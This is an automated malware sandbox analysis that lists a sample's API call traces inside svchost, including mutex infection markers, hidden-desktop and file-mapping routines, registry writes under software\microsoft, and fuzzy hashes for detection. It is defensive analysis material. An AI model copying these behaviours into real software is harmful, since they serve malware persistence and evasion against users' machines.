                                                                                                                                                                                                                • Instruction Fuzzy Hash: 40112171601314EBD710ABB6ED49B9B7A989F85751B104135FB09F32E1DA38CD04CAA8
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}), ref: 02D443BC
                                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 02D443D2
                                                                                                                                                                                                                • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}), ref: 02D443E0
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02D443E9
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D44401
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D44413
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(02D7D2A0), ref: 02D4441E
                                                                                                                                                                                                                • Sleep.KERNEL32(00009C40,02D7D2A0,YOTA), ref: 02D44438
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Mutex$HandleOpenSleep$BackslashCloseInformationPathRelease
                                                                                                                                                                                                                • String ID: Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}$YOTA
                                                                                                                                                                                                                • API String ID: 849374196-4127202605
                                                                                                                                                                                                                • Opcode ID: 784422536a3f2386d595f2491aeb550312af17008cfc9bbd7e9e5e35d542f5ee
                                                                                                                                                                                                                • Instruction ID: 1a7e2f66587e01701ddbe6ca605a892f6f78b9ab0d72d066a0b4a9019eefa92f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 784422536a3f2386d595f2491aeb550312af17008cfc9bbd7e9e5e35d542f5ee
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C4012632AC03102BE211A7A07C4DF6A73989F44B18F944515FD85A2380DFF4EC5486B5
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}), ref: 02D4404C
                                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 02D44062
                                                                                                                                                                                                                • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}), ref: 02D44070
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02D44079
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D44091
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D440A3
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(02D7D19C), ref: 02D440AE
                                                                                                                                                                                                                • Sleep.KERNEL32(00009C40,02D7D19C,VEFK), ref: 02D440C8
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Mutex$HandleOpenSleep$BackslashCloseInformationPathRelease
                                                                                                                                                                                                                • String ID: Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}$VEFK
                                                                                                                                                                                                                • API String ID: 849374196-3911370694
                                                                                                                                                                                                                • Opcode ID: 2bb964fff12ace79f6092aca5d8212c51aacdabd31caea468f79838945aaa2c4
                                                                                                                                                                                                                • Instruction ID: 35cbe0b08f633fdc00e29a97d25bf8dc81d9d26503fe42c9778f2a928dea8327
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2bb964fff12ace79f6092aca5d8212c51aacdabd31caea468f79838945aaa2c4
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5101F932A817142BF3219BA0BC0EF6E73889F45B54F654505FD45A6380DFA4AC648ABA
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}), ref: 02D416FC
                                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 02D41712
                                                                                                                                                                                                                • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}), ref: 02D41720
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02D41729
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D41741
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D41753
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(02D7D4A8), ref: 02D4175E
                                                                                                                                                                                                                • Sleep.KERNEL32(00009C40,02D7D4A8,OFFSHORE), ref: 02D41778
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Mutex$HandleOpenSleep$BackslashCloseInformationPathRelease
                                                                                                                                                                                                                • String ID: Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}$OFFSHORE
                                                                                                                                                                                                                • API String ID: 849374196-3031696281
                                                                                                                                                                                                                • Opcode ID: d4468e53e676ae24a25e1f9c24ef353287acbfac9155a01e409c4c74129a11d2
                                                                                                                                                                                                                • Instruction ID: 922c886a19701f097d0173f910299a8a8f470d8cd1ee654aa57a9fb9f6a7356c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d4468e53e676ae24a25e1f9c24ef353287acbfac9155a01e409c4c74129a11d2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F7016D32AC07106BF31167A0BC4EF6A73989F44BA4F040514FD49A2380DFF8DC5486B5
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • OpenMutexA.KERNEL32(00100000,00000000,Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}), ref: 02D3B41C
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02D3B425
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02D3B439
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D3B44B
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(5e8dc0d9), ref: 02D3B456
                                                                                                                                                                                                                • Sleep.KERNEL32(00009C40,5e8dc0d9,ALPHA), ref: 02D3B470
                                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 02D3B476
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: HandleMutexSleep$BackslashCloseInformationOpenPathRelease
                                                                                                                                                                                                                • String ID: 5e8dc0d9$ALPHA$Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
                                                                                                                                                                                                                • API String ID: 4280258085-3416370051
                                                                                                                                                                                                                • Opcode ID: 52e773caa5307cd1b212cc8eeeb3c81013b140734761813188db9b7391adb7c7
                                                                                                                                                                                                                • Instruction ID: 57a21cc2e7593e11aeee8599656d1eb31c76c373548bed58df391f9ecf2bc474
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 52e773caa5307cd1b212cc8eeeb3c81013b140734761813188db9b7391adb7c7
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B0F0F431A887046AE2026B61FC0EF5A3798AF19A2CF504916F58691380DBF4ED10C6BA
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}), ref: 02D3F9BC
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02D3F9C5
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02D3F9D9
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D3F9EB
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(5e8dc163), ref: 02D3F9F6
                                                                                                                                                                                                                • Sleep.KERNEL32(00009C40,5e8dc163,HANDY), ref: 02D3FA10
                                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 02D3FA16
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: HandleMutexSleep$BackslashCloseInformationOpenPathRelease
                                                                                                                                                                                                                • String ID: 5e8dc163$HANDY$Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}
                                                                                                                                                                                                                • API String ID: 4280258085-1532886009
                                                                                                                                                                                                                • Opcode ID: 81ff6722ef74eab8a1cfb917605c401724ae417c146f2a6ee9f642da470c5fd9
                                                                                                                                                                                                                • Instruction ID: f6e172d242815f3bce2b1f093b963b4f884caff9a32d17f9c6559e001abcdea2
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 81ff6722ef74eab8a1cfb917605c401724ae417c146f2a6ee9f642da470c5fd9
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 44F0F432EC83097EE20267A0EC0EF5E73986F05B04F550604F982A1390DBF49D54CAB6
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}), ref: 02D42EFC
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02D42F05
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02D42F19
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D42F2B
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(5E8DC473), ref: 02D42F36
                                                                                                                                                                                                                • Sleep.KERNEL32(00009C40,5E8DC473,RFK), ref: 02D42F50
                                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 02D42F56
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: HandleMutexSleep$BackslashCloseInformationOpenPathRelease
                                                                                                                                                                                                                • String ID: 5E8DC473$Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}$RFK
                                                                                                                                                                                                                • API String ID: 4280258085-3548839560
                                                                                                                                                                                                                • Opcode ID: 948506a9490ee5adac6cb45ce3970e6c195692afcfd90a991d54469951f913d8
                                                                                                                                                                                                                • Instruction ID: 514bddd20128624547ee06a3a1cb82b8e4b361019ebb228d2abf2e3a31bfcd53
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 948506a9490ee5adac6cb45ce3970e6c195692afcfd90a991d54469951f913d8
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A9F0F4319C83117BF2106BA1AC0DF1F37986F04B04F910514FA86A23C1DFE4AD54C6B6
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 00402E47
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,.5@,753CE610,00402E2E), ref: 00402E5F
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 00402E62
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00402E6F
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00402E72
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,.5@,.5@,753CE610,00402E2E), ref: 00402E7B
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 00402E7E
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,.5@), ref: 00402E8B
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00402E8E
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2909940532.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2909940532.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$Free$Validate$String
                                                                                                                                                                                                                • String ID: .5@
                                                                                                                                                                                                                • API String ID: 2629017576-427766238
                                                                                                                                                                                                                • Opcode ID: 68846457a1a63d72fa89529ead8f04e900e348e70f49c4da8581cfeb29d1e508
                                                                                                                                                                                                                • Instruction ID: 8a0f41a42cc1d9b8d1979a4e7edab232083dfb301258e97597ac6d2db269471b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 68846457a1a63d72fa89529ead8f04e900e348e70f49c4da8581cfeb29d1e508
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 10F0FEB2641211ABE6106BB59E4CF5B3A5CEF95B56F044525B708F71D0CA74CC0086B8
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}), ref: 02D3C69C
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02D3C6A9
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02D3C6BD
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D3C6CF
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D3C6DE
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(5E8DC08D), ref: 02D3C6E5
                                                                                                                                                                                                                • Sleep.KERNEL32(00009C40,5E8DC08D,BSS), ref: 02D3C6FF
                                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 02D3C705
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: HandleMutexSleep$BackslashCloseInformationObjectOpenPathReleaseSingleWait
                                                                                                                                                                                                                • String ID: 5E8DC08D$BSS$Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
                                                                                                                                                                                                                • API String ID: 3206501308-1397768872
                                                                                                                                                                                                                • Opcode ID: d05e08324df802dc2968aabfc71b34583617bce7ab990dafa5305923bf3e1964
                                                                                                                                                                                                                • Instruction ID: c094514477c8075bcf4dc840062da6762ad3d4db7126122cceeee3df31fd2d4f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d05e08324df802dc2968aabfc71b34583617bce7ab990dafa5305923bf3e1964
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 25F096309D9351AFE3226B60EC0DF1E37546F09B59F104905F846B1380DBB89C18CB76
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SetThreadDesktop.USER32(?,74DF3050,74DF30D0,74DF3080), ref: 02D28F00
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D28F14
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D28F1F
                                                                                                                                                                                                                • UnmapViewOfFile.KERNEL32(00000000,?,00000006,00000000), ref: 02D28F47
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D28F64
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D28F75
                                                                                                                                                                                                                • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,02D6F54C), ref: 02D28F95
                                                                                                                                                                                                                • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 02D28FAC
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 02D28FEC
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000,0000007E,?,00000000,?,00000006,00000001,00000000,00000000), ref: 02D29034
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000,?,00000000,?,00000006,00000001,00000000,00000000), ref: 02D2903D
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$HandleMutexObjectReleaseSingleViewWait$CloseCreateDesktopFreeHeapInformationMappingThreadUnmap
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2125184990-0
                                                                                                                                                                                                                • Opcode ID: 3f46bb8686d60f756fe6e837ffb4280045336b6aed0b1bf777374581b98bbb7a
                                                                                                                                                                                                                • Instruction ID: 3a5e51b4a92443aa8cea07cf3297eb3b4c15c19024309cef5b2b2aa408028efb
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3f46bb8686d60f756fe6e837ffb4280045336b6aed0b1bf777374581b98bbb7a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3941EE76A80350ABD710DF64ED68FA637A9EB58314F244E04FA51873C0D7B5AC68CB70
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,-05ADF5C8,00000000,00000000,?,?,?,?), ref: 02D2F164
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 02D2F16B
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D2F17B
                                                                                                                                                                                                                • memcpy.MSVCRT ref: 02D2F186
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(?,00000000,00000000,?,?,02D6573C,?,02D65CF4,-05ADF5C8,00000000,00000000,?), ref: 02D2F24E
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02D2F255
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(?,00000000), ref: 02D2F261
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02D2F268
                                                                                                                                                                                                                • memcpy.MSVCRT ref: 02D2F28E
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,-05ADF5C8,00000000,00000000,?,?,?,?), ref: 02D2F2BA
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02D2F2BD
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D2F2CA
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02D2F2CD
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$FreeValidatememcpy$Allocmemset
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1948005343-0
                                                                                                                                                                                                                • Opcode ID: 85d4cae9df58d08f3a31e147c318d62ac32d3fee695defba96b043033785ede1
                                                                                                                                                                                                                • Instruction ID: db9233a72f86a686580525f5df91f21f0c726a8153767ee49fb8e03fc71805c3
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 85d4cae9df58d08f3a31e147c318d62ac32d3fee695defba96b043033785ede1
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F461E376A002299FDB11CF58D884AAAB7B9EF99728F048A5AFD04D7340D731DC55CBE0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02D3433A
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D34370
                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,?,?,?,00000000), ref: 02D34397
                                                                                                                                                                                                                • RegQueryValueExA.ADVAPI32(?,00000001,00000000,00000001,00000000,00000104,?,?,00000000), ref: 02D343BA
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000015,?,?,00000000), ref: 02D3442D
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 02D34434
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D34444
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 02D34472
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heapmemset$AdminAllocCloseOpenProcessQueryUserValue
                                                                                                                                                                                                                • String ID: software\microsoft
                                                                                                                                                                                                                • API String ID: 1484339481-3673152959
                                                                                                                                                                                                                • Opcode ID: 1dd5e30a9ddec87c0bf64b3902cd233d6e9ba1cd23c74e80e9e9f6562210fb31
                                                                                                                                                                                                                • Instruction ID: 0a8c579ed04811f5cbc20eb339e172c3e991d69b9a2b5702c0d30ac5ff7559e6
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1dd5e30a9ddec87c0bf64b3902cd233d6e9ba1cd23c74e80e9e9f6562210fb31
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4D41E832900159ABCB22CB64DC18FDABBB8DF85B14F1541A4ED84A7300D774DE49CBB1
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D278B3
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D278CB
                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(00000001,software\microsoft,00000000,00000101,?,?,?,?,?,?,74DEF380), ref: 02D278EC
                                                                                                                                                                                                                • RegQueryValueExA.ADVAPI32(?,00000104,00000000,00000001,?,00000104,?,?,?,?,?,74DEF380), ref: 02D27912
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,74DEF380), ref: 02D2799D
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,74DEF380), ref: 02D279A4
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D279B3
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,74DEF380), ref: 02D279E3
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memset$Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                                • String ID: software\microsoft
                                                                                                                                                                                                                • API String ID: 4158279268-3673152959
                                                                                                                                                                                                                • Opcode ID: cd01792dac721b609607b6b36e7df20469053fe9315871e884f2e2cc30fd1496
                                                                                                                                                                                                                • Instruction ID: 55068a56a48e21865960c6178bb42d1c821bbc689239f9caf38129cc6e790012
                                                                                                                                                                                                                • Opcode Fuzzy Hash: cd01792dac721b609607b6b36e7df20469053fe9315871e884f2e2cc30fd1496
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 65410B7194026D6FEB24DB649C98AEEB7ADEF5D308F4045A9E545E3340D3708E898BB0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D27BC2
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D27BE0
                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(02D35889,software\microsoft,00000000,00000102,80000002,?,?,?,?,00000000,0000000A), ref: 02D27C7D
                                                                                                                                                                                                                • RegSetValueExA.ADVAPI32(80000002,a1633cfca,00000000,00000001,?,00000104,?,?,?,?,00000000,0000000A), ref: 02D27C9F
                                                                                                                                                                                                                • RegDeleteValueA.ADVAPI32(80000002,a1633cfca,?,?,?,?,00000000,0000000A), ref: 02D27CAC
